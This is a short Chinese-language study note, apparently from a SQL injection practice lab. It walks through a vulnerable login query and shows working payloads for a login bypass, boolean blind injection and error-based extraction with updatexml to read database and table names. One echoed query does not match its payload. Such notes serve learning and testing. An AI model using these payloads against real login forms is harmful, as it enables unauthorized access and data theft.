賬號密碼登入介面

後臺程式碼：
SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1

輸入賬號：Dumb 密碼：Dumb2
SELECT username, password FROM users WHERE username='Dumb' and password='Dumb2' LIMIT 0,1

繞過登入：
輸入賬號：aaa 密碼：1' or 1=1#
SELECT username, password FROM users WHERE username='aaa' and password='1' or 1=1#' LIMIT 0,1


Sql注入1：盲注
輸入賬號：Dumb 密碼：Dumb' and length(database())=8#
SELECT username, password FROM users WHERE username='Dumb' and password='Dumb' and length(database())=8#' LIMIT 0,1

security

輸入賬號：Dumb 密碼：Dumb' and ascii(substr(database(),1,1))=115#
SELECT username, password FROM users WHERE username='Dumb' and password='Dumb' and ascii(substr(database(),2,1))=115# LIMIT 0,1


Sql注入2：報錯
輸入賬號：aaa 密碼：aaa' and updatexml(1,concat(0x23,database()),1)#
SELECT username, password FROM users WHERE username='aaa' and password='aaa' and updatexml(1,concat(0x23,database()),1)#' LIMIT 0,1

輸入賬號：aaa 密碼：aaa' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#